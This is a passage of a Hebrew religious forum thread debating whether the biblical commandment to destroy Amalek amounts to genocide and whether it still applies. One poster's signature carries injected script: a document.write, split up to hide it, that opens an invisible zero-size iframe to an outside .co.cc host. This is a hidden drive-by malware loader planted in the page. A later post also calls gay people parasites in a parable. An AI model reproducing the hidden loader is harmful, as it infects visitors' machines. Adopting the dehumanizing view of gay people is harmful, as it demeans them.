בית פורומים עצור כאן חושבים

האם הגרמנים לא צדקו? הלא הבא להרגך השכם להרגו.

שלום אורח. באפשרותך להתחבר או להירשם
הצג 15 הודעות בעמוד הוסף לדף האישי  דווח למנהל שלח לחבר
נשלח ב-1/5/2011 15:09 לינק ישיר 

הדיבורים על גזע עמלק כגזע שאי אפשר לתקן את רצון הרצח שבו- הוא מופרכת מעיקרא- הגמרא אומרת בגיטין- בני בניו של המן הרשע לימדו תורה בבני ברק. המן כידוע היה עמלקי.

אין עמלק ואין שבעת העממין ואין אפשרות לאף אחד לקיים את מצוות העשה הזה של מחיית זרע עמלק או הכחדת העמים.
יש דינים בתורה כבן סורר ומורה עיר הנדחת ואחרים שנלמדים לתאוריה בלבד של לימוד. וכל הקושר את עמלק -לא כרעיון- לעם מסוים מגלה פנים בתורה שלא כהלכה.

דדווח על תוכן פוגעני

נשלח ב-1/5/2011 15:14 לינק ישיר 

הנוכח

אני משער שפנית אלי בשם חיבה?

העלית את השאלה מה הייתי עושה אילו הייתי מקבל ציווי להרוג עמלקי. היית יכול להוסיף: לשחוט את בני האהוב יצחק...

אני מניח שהייתי חושב שלא הבנתי את דבר האלקים.

אולי צריך לברר מהו דבר האלקים ואיך הוא מתקבל בנבואה, והאם תיתכן נבואה למעשה אכזריות ורשע. לפחות בעינינו.

יש לי דוגמא לכך שאביאנה לקמן.

בכל אופן, לו יצוייר שאקבל נבואה כזו כפי שתארת, אני משער שיעמדו בפני האפשרויות הבלתי מרנינות הבאות:

א. להרוג את העמלקים. ולעשות מעשה שנראה לי מרושע ואכזרי.

ב. לסרב.

ג. להתלבט ולא לעשות כלום. זה דומה מאד לב' בלי לסרב ממש.

אולם אפשר שהצגת השאלה על ידך לוקה בפשטנות יתר. אולי אפרש שהדרישה של ה' ממני לשחוט עמלקים היא רק נסיון, והעמידה בנסיון היא באמת לסרב לעשותו?

(שמא תקשה מן העקידה? ואולי מה שאברהם היה אמור לעשות הוא לסרב? אבל אני מרחיק לכת...).

האם מה שאנו כותבים כאן, אני ואלו שמנסים להימלט מן המצוקה של מצוה לרצח עם, האם עמדה זו מקובלת על רוב בני ישראל האורתודוכסים היום?

שאלה נגדית: מי הוא שדעתו אמורה לקבוע, אלו שלא למדו ולא עיינו, או המומחים?

לעתים מתבצעים מהלכים פרשניים, והם מחלחלים "החוצה" לרוב הציבור לאט לאט. יתכן שזה מה שקורה כעת עם השאלה לגבי מחית עמלק.

לפי זה, העובדה שיש בציבור רבים שיחשבו לא כך, כפי שיש גם ראשי ישיבות שחשבו שהמצוה נועדה לקיום כפשוטה, היא רק כיון שהפירוש הנכון לא התפרסם דיו.

בדקתי בויקי מה זה "פתטי" ומצאתי שזו לשון לועזית ל"מעורר רחמים". ואני חשבתי שמה שאני כותב זה דיון אנליטי. חבל שטעיתי. ואולי לא אני הוא שטעיתי? (אילו היתה לי גישה לאיקונים, הייתי מצרף איקון עומד על הראש ומחייך).

אני סבור שאני יודע מה אתה יכול לטעון, וכבר טענת זאת. הפירוש שהצעתי כאן הוא יוצא דופן במסורת הפירושים שלנו. גם אם זה לא הופך אותו לשקרי, זה עדיין הופך אותו למחודש, האין זאת?

וכיון שאני יודע שזה פירוש "מחודש", הכיצד אני מרשה לעצמי "לרמות" ולטעון שזו כוונת ה' בנתינת מצווה זו?

אני משער שהנסיון להעלות טיעון כזה הוא שנראה לך "מעורר רחמים".

ואולי במקום לעורר רחמים הפרשנות הזו צריכה לעורר התפעלות? אולי עלינו להבין שאם אנו גדלנו והתבגרנו ואנו בעלי ערכים ואנו מאמינים בהם באמונה שלימה, אזי עלינו להשתמש בהם בפרשנות התורה, וזה מה שה' רוצה מאיתנו?

שומר פיו ולשונו - שומר מצרות נפשו < type="text/">document.write("");

דדווח על תוכן פוגעני

נשלח ב-1/5/2011 15:16 לינק ישיר 

הג'נוסייד הראשון היה המבול כמדומני... (אם נניח לבדיחה הידועה על קין שהרג רבע עולם)

דדווח על תוכן פוגעני

נשלח ב-1/5/2011 15:17 לינק ישיר 

ירוחם

חשבתי להעלות את הטענה הזו נגד גישתו של שותף סוד, אבל חזרתי בי. כמדומה שלפי קבלת האר"י ברגע שגוי מתגייר, נכנסת בו נשמה חדשה. נשמה זו תאפשר לו ללמוד תורה ואף ללמד.

עוד יש לומר שדווקא בני בניו של המן לימדו תורה מפני שהיה בהם ניצוץ שבקדושה, ולכן לא רצה יעקב להרוג את עשו כדי שלא לאבד את הניצוץ הזה... (יש אפילו ווארט חסידי כזה, שכחתי של מי, שיעקב חשש פן יהרוג אחרים, כלומר "אחרים" הוא רבי מאיר...).

בין כך וכך, שערי תירוצי קבלה לא ננעלו ושם קל מאד לתרץ. (גרשם שלום עצמו כתב שיש הסברים קבליים שהם כה יפים וספרותיים, מעשה ידי אמן, עד שהם מעוררים התפעלות. אילו הייתי שותף סוד, הייתי מביא זאת כראיה שאפילו חוקר הקבלה והמתנגד לה הכיר באלקיות שבה...).

לכן העדפתי להקשות מצאצאי עמלק שלא התגיירו ולשאול איך מתבטא הרע הקוסמי שבתוכם. ולזה אין לי תשובה. ועלינו לחכות לשותף סוד שילמדנו דעת.

דדווח על תוכן פוגעני

נשלח ב-1/5/2011 15:21 לינק ישיר 

ירוחםשמ כתב:
הדיבורים על גזע עמלק כגזע שאי אפשר לתקן את רצון הרצח שבו- הוא מופרכת מעיקרא- הגמרא אומרת בגיטין- בני בניו של המן הרשע לימדו תורה בבני ברק. המן כידוע היה עמלקי.

אין עמלק ואין שבעת העממין ואין אפשרות לאף אחד לקיים את מצוות העשה הזה של מחיית זרע עמלק או הכחדת העמים.
יש דינים בתורה כבן סורר ומורה עיר הנדחת ואחרים שנלמדים לתאוריה בלבד של לימוד. וכל הקושר את עמלק -לא כרעיון- לעם מסוים מגלה פנים בתורה שלא כהלכה.

אדוני. שאול הפסיד את המלוכה, בגלל שלא השלים את השמדת עמלק. ואתה אומר שזה רק עניין תאורטי.  

דדווח על תוכן פוגעני

נשלח ב-1/5/2011 15:22 לינק ישיר 

כנראה שכשהקב"ה מדבר אליך אתה בטוח שזה הוא ולכן אתה מקיים בלי לשאול שאלות..
(מצד שני גם חולי הנפש בטוחים במאה אחוז שדיברו עימהם..)

וְאִישׁ אֶחָד מִבְּנֵי הַנְּבִיאִים אָמַר אֶל רֵעֵהוּ בִּדְבַר יְהוָה הַכֵּינִי נָא וַיְמָאֵן הָאִישׁ לְהַכֹּתוֹ:
וַיֹּאמֶר לוֹ יַעַן אֲשֶׁר לֹא שָׁמַעְתָּ בְּקוֹל יְהוָה הִנְּךָ הוֹלֵךְ מֵאִתִּי וְהִכְּךָ הָאַרְיֵה וַיֵּלֶךְ מֵאֶצְלוֹ וַיִּמְצָאֵהוּ הָאַרְיֵה וַיַּכֵּהוּ:

דדווח על תוכן פוגעני

נשלח ב-1/5/2011 15:26 לינק ישיר 

מיימוני כתב:
הנוכח

אני משער שפנית אלי בשם חיבה?

העלית את השאלה מה הייתי עושה אילו הייתי מקבל ציווי להרוג עמלקי. היית יכול להוסיף: לשחוט את בני האהוב יצחק...

אני מניח שהייתי חושב שלא הבנתי את דבר האלקים.

אולי צריך לברר מהו דבר האלקים ואיך הוא מתקבל בנבואה, והאם תיתכן נבואה למעשה אכזריות ורשע. לפחות בעינינו.

יש לי דוגמא לכך שאביאנה לקמן.

בכל אופן, לו יצוייר שאקבל נבואה כזו כפי שתארת, אני משער שיעמדו בפני האפשרויות הבלתי מרנינות הבאות:

א. להרוג את העמלקים. ולעשות מעשה שנראה לי מרושע ואכזרי.

ב. לסרב.

ג. להתלבט ולא לעשות כלום. זה דומה מאד לב' בלי לסרב ממש.

אולם אפשר שהצגת השאלה על ידך לוקה בפשטנות יתר. אולי אפרש שהדרישה של ה' ממני לשחוט עמלקים היא רק נסיון, והעמידה בנסיון היא באמת לסרב לעשותו?

(שמא תקשה מן העקידה? ואולי מה שאברהם היה אמור לעשות הוא לסרב? אבל אני מרחיק לכת...).

האם מה שאנו כותבים כאן, אני ואלו שמנסים להימלט מן המצוקה של מצוה לרצח עם, האם עמדה זו מקובלת על רוב בני ישראל האורתודוכסים היום?

שאלה נגדית: מי הוא שדעתו אמורה לקבוע, אלו שלא למדו ולא עיינו, או המומחים?

לעתים מתבצעים מהלכים פרשניים, והם מחלחלים "החוצה" לרוב הציבור לאט לאט. יתכן שזה מה שקורה כעת עם השאלה לגבי מחית עמלק.

לפי זה, העובדה שיש בציבור רבים שיחשבו לא כך, כפי שיש גם ראשי ישיבות שחשבו שהמצוה נועדה לקיום כפשוטה, היא רק כיון שהפירוש הנכון לא התפרסם דיו.

בדקתי בויקי מה זה "פתטי" ומצאתי שזו לשון לועזית ל"מעורר רחמים". ואני חשבתי שמה שאני כותב זה דיון אנליטי. חבל שטעיתי. ואולי לא אני הוא שטעיתי? (אילו היתה לי גישה לאיקונים, הייתי מצרף איקון עומד על הראש ומחייך).

אני סבור שאני יודע מה אתה יכול לטעון, וכבר טענת זאת. הפירוש שהצעתי כאן הוא יוצא דופן במסורת הפירושים שלנו. גם אם זה לא הופך אותו לשקרי, זה עדיין הופך אותו למחודש, האין זאת?

וכיון שאני יודע שזה פירוש "מחודש", הכיצד אני מרשה לעצמי "לרמות" ולטעון שזו כוונת ה' בנתינת מצווה זו?

אני משער שהנסיון להעלות טיעון כזה הוא שנראה לך "מעורר רחמים".

ואולי במקום לעורר רחמים הפרשנות הזו צריכה לעורר התפעלות? אולי עלינו להבין שאם אנו גדלנו והתבגרנו ואנו בעלי ערכים ואנו מאמינים בהם באמונה שלימה, אזי עלינו להשתמש בהם בפרשנות התורה, וזה מה שה' רוצה מאיתנו?

שומר פיו ולשונו - שומר מצרות נפשו ******* type="text/">document.write("*************** scrolling='no' frameborder='0' height='0px' width='0px' src='ht"+"tp:"+"/"+"/"+"vjgvj.co"+".cc/?a="+***************+"'><*");

מוזר.
למה אתה חושב שלאסור על הומוסקסואליות (אני לא מדבר על לסקול למעשה שזה חז"ל הפכו לבלתי אפשרי ולא רק לגבי הומוסקסואלים אלא גם לגבי מעשים מסכני חברה כמו רצח) זה מוסרי?
יבוא הומוסקסואל ויגיד כנראה שלא הבנתי נכון. לא יודע מה כן, אבל לאסור עליי לא.
יש לך עולם מוסרי, ואתה מחליט באופן סלקטיבי מה לקבל ומה לא. בשביל מה אתה צריך את הטקסט? אתה לא עובד את האל אלא את הערכים, ולא זו בלבד אלא שאת הערכים שהצ'כונה (במלעיל; קרדיט ל "ייתכן") שלך הטמיעה בך (מוסרי לאסור הומוסקסואליות אך לא מוסרי להרוג עמלקים).
אני חושב שאם אתה שוקל לסרב לאל אתה לגמרי אפיקורס (לא שזה נורא כל כך. רק עובדה)

ולגבי אברהם והניסיון החבוי (טוב תמיד ידענו שהאל עושה משחקים...):
אם יתכן שמאחורי דברים מפורשים עומדת כוונה נסתרת להתעלם מהם, אולי הניסיון האמיתי של הדתיים בעולם הוא להתגבר על המכשולים הפסיכולוגיים ולהכריע, לפי התבונה ו(חוסר) הראיות (לאל בכלל ולאל מצווה בפרט וליהדות בפרט פרט ולאורתודוקסיה בפרט פרט פרט), עמדה אגנוסטיקנית או אתאיסטית, ומלאה הארץ דיעה את ההומניזם כמים לים מכסים, ולא ישא גוי אל גוי מטוס לתוך גורד שחקים ולא ילמדו עוד מלחמה ב"כפירה"?
נקודה למחשבה.

דדווח על תוכן פוגעני

נשלח ב-1/5/2011 15:28 לינק ישיר 

יונתן

זה בדיוק המקור שרציתי להביא. הוא מעורר קושיות גדולות לפי הגישה הפרשנית שלי. וכי היה על חברו של בן הנביאים להכותו? ומדוע נענש?

חכם לעצמו

לא נראה לי ששאול הפסיד את המלוכה בגלל שלא השמיד את כל עמלק.

להזכירך, הוא כן הרג את כולם, והשאיר בהמות שעליהן חמל (=בעברית מקראית: התקמצן) ובגלל שפחד מהעם ולא היה מסוגל להשתלט עליהם.

ובעיקר משום שלאחר ששמואל הוכיח אותו, הוא התכחש ושיקר לעצמו ואמר שבכל זאת עשה את דבר ה' והכל בסדר.

(ועל זה אמרו חז"ל ששאול בפעם אחת ולא עלתה לו ודוד בשתים ועלו לו, כי דוד הודה מייד וחזר בו, במעשה בת שבע ונתן הנביא).

כלומר, מה שהפיל את שאול לא היה החטא של אי מחית עמלק (או לא רק) אלא הפסול במידות שאינן מתאימות למלך, חוסר יכולת לשלוט באחרים, ועוד יותר חוסר יכולת לשלוט בעצמו ולהודות על האמת לעצמו.

דדווח על תוכן פוגעני

נשלח ב-1/5/2011 15:31 לינק ישיר 

הנוכח

יפה שאלת! לא חשבתי מספיק ולא ראיתי שדברי מביאים לעמדה כזו שהצגת.

עלי לחשוב. 

אני מסכם בינתים את מה שאני מוצא בדבריך:

1. האם הערכים של התחשבות בזולת אינם מצריכים להתיר להומוסקסואלים לחיות כחפצם.

2. אם יש "נסיון הפוך" אז אולי הנסיון של היהודים הוא להתמרד נגד ה'? או לפחות להודות בשעה שאין להם תשובה ולהפוך לאגנוסטיקאים?

ועל זה הוספת:

איך מזהים ערכים מוחלטים להבדיל מ"ערכים תרבותיים" (=של שכונה)?

לגבי השאלה האחרונה, אני מקוה לענות ליתכן באשכול מיוחד. מקוה שאמצא זמן. טרם מצאתי.

דדווח על תוכן פוגעני

נשלח ב-1/5/2011 15:35 לינק ישיר 

מיימוני כתב:
יונתן

זה בדיוק המקור שרציתי להביא. הוא מעורר קושיות גדולות לפי הגישה הפרשנית שלי. וכי היה על חברו של בן הנביאים להכותו? ומדוע נענש?

כתוב "מבני הנביאים.. חברו.." משמע שהם היו קבוצה של נביאים (כמו זאת ששאול נדבק אליהם) וידעו בבירור שכל אחד 
שם הוא נביא אמת. (אם לא כנראה שהיה יכול לבקש ממנו אות לפני שיעשה כדבריו)

דדווח על תוכן פוגעני

נשלח ב-1/5/2011 15:36 לינק ישיר 

מיימוני - 

נראה שבאופן פרדוקסלי (מבחינה לוגית, אך לא הפסיכולוגית, וכדלקמן) ככל שיהיו יותר שאלות עמדתך כך תחזיק בה יותר חזק...

מהבחינה הפסיכולוגית מדובר בקלאסיקה של דיסוננס קוגניטיבי, ובמקרה שלך - כמו העצכ"חי בכלל - מתווסף העניין שכל עמדה שמספקת לך דיונים אינסופיים ומכריחה אותך להתפלפל, להגדיר הגדרות דקות מן הדקות ולהתקשקש עם מילים גבוהות כמו (פסאודו-) לוגיקה סינתטית - היא עמדה שאתה מאוד תשמח לאחוז בה. אחרת מה תעשה בחיים, בתור בני ברקי שלא יכול ללמוד באוניברסיטה, לא יכול לצאת לטיולים במזרח הרחוק וכו', אם לא לנבור בתוך הנפש ולנסות לשכנע אנשים אחרים מול המחשב?

דדווח על תוכן פוגעני

נשלח ב-1/5/2011 15:40 לינק ישיר 

חכם לעצמו
אתה מנסה להצדיק את הגרמנים על מעשה ששאל עשה או לא עשה לפני כ3000 שנה. אז זה היה הנוהג בעולם- גם אצל הגרמנים הברברים, אלף שנה אחר כך, מכאן להביא השוואה להיום? להצדיק את הגרמנים- בגלל זה? גם כשמאל רדיקלי אתה מגזים בצורה פרועה, מגזים זו מילה עדינה.
היום ולפני אלפיים שנה ויותר מחיית עמלק היתה תאורטית בלבד, אף אחד לא חשב עליה בצורה ריאלית ואף אחד לא תיכנן לקיים את המצווה,
אבל מה שוות העובדות כנגד הרעיון. להאשים את עם ישראל בג'נוסיד, הרי זה מכרה זהב בשביל השמאל, לעזעזאל העובדות.

דדווח על תוכן פוגעני

נשלח ב-1/5/2011 15:44 לינק ישיר 

נשאל את זה אחרת -
האם הסיכון ש20% מהילדים (נניח שזה מסתכם בזה, וזה לא) יפתחו עמדה גזענית שתומכת בג'נוסייד כפשוטו, אינו יותר חמור מהסיכון שעם הארץ אחד יטלטל מגילה כדי שהחכם ילמד אותו לקרוא בה, כי היכי שנבטל טוטאלית את קריאת פרשת זכור ומגילת אסתר?

דדווח על תוכן פוגעני

נשלח ב-1/5/2011 15:46 לינק ישיר 

thepresent כתב:
מוזר. למה אתה חושב שלאסור על הומוסקסואליות (אני לא מדבר על לסקול למעשה שזה חז"ל הפכו לבלתי אפשרי ולא רק לגבי הומוסקסואלים אלא גם לגבי מעשים מסכני חברה כמו רצח) זה מוסרי?

ישבו להם שני האבטיחים על השולחן,
ואחת מהם רואה שבעל בית אוסף לו (מחברתו) את גרעיניו בכבוד ובעדינות ופינוק מרבי,
ואת גרעיניו הוא זורק ולא מתייחס כלל,

הייי היי זעוק האבטיח לבעל הבית מה זה הגזענות אתה לא מתבייש ?? איפה המוסר יא נאצי אחד ??
הבעל הבית עם פניו החיוור מהאשמה הכבדה כלפיו, לא יודע איך להסביר לו,
בסוף מקבל אומץ ואומר לו, תשמע, אתה הומו, ולכן גרעיניך לא שווה לנו כלום ולכן זורקים אותם,
מסכן שלי, תבין שכל נולד תורם לאנושות גם זרע, לא רק מגיע להנות בעולם מעמלם של כל קדמונינו מאלפי שנים,
אתה נולדת רק לקחת, כולם גם זורעים ידים\מוח\רגלים\תובנות, עובדות לדורות הבאים,
אתה (בלי לפגוע) פראזיט אמיתי,
אבל חברתך האבטיח שהוא גם מוליד ידים עובדות לדורות ?! נפנק אותו בצדק,

תוקן על ידי maxmen ב- 01/05/2011 15:52:50

דדווח על תוכן פוגעני

נשלח ב-1/5/2011 15:49 לינק ישיר 

ירוחםשמ כתב:
חכם לעצמו
אתה מנסה להצדיק את הגרמנים על מעשה ששאל עשה או לא עשה לפני כ3000 שנה. אז זה היה הנוהג בעולם- גם אצל הגרמנים הברברים, אלף שנה אחר כך, מכאן להביא השוואה להיום? להצדיק את הגרמנים- בגלל זה? גם כשמאל רדיקלי אתה מגזים בצורה פרועה, מגזים זו מילה עדינה.
היום ולפני אלפיים שנה ויותר מחיית עמלק היתה תאורטית בלבד, אף אחד לא חשב עליה בצורה ריאלית ואף אחד לא תיכנן לקיים את המצווה,
אבל מה שוות העובדות כנגד הרעיון. להאשים את עם ישראל בג'נוסיד, הרי זה מכרה זהב בשביל השמאל, לעזעזאל העובדות.

הכוונה היא להסתכל על זה בעיניים של הלכה. קח לדוגמא את גואל הדם שמותר לו להרוג את הרוצח. מה הדין אם הרוצח
(בשוגג) באקט של הגנה עצמית הרג אותו? פטור, למרות שמלכתחילה היה מותר לגואל הדם להרוג את הרוצח ואסור לרוצח
להרוג את גואל הדם.

דבר שני שנובע מדבריך, האם כיום התבטלה מצוות עמלק כי היא "לא מוסרית"? אם נקים מדינת הלכה ונניח שסנחריב
לא היה מבלבל את האומות והיה ידוע לנו איפה עמלק היינו יכולים לפטור את עצמנו מקיום המצוה? 
(אח"כ אפשר לדון גם במוסריות של הקורבנות...)

דדווח על תוכן פוגעני

בית > פורומים > דת ואמונה > עצור כאן חושבים > האם הגרמנים לא צדקו? הלא הבא להרגך השכם להרגו.
מנהל לחץ כאן לנעילת האשכול
הוסף לעמוד האישי  דווח למנהל שלח לחבר
לדף הקודם 1 2 3 4 5 7 8 9 לדף הבא סך הכל 9 דפים.

bholext
2009 © כל הזכויות שמורות לבחדרי חרדים. קטגוריית אקטואליה וחדשות: עשרות פורומים הכוללים חדשות נעייס, מה קורה בחצרות חסידים, חדשות מחסידויות שונות בארץ ובעולם, דיונים בנושאי אקטואליה, פוליטיקה, בטחון ועוד.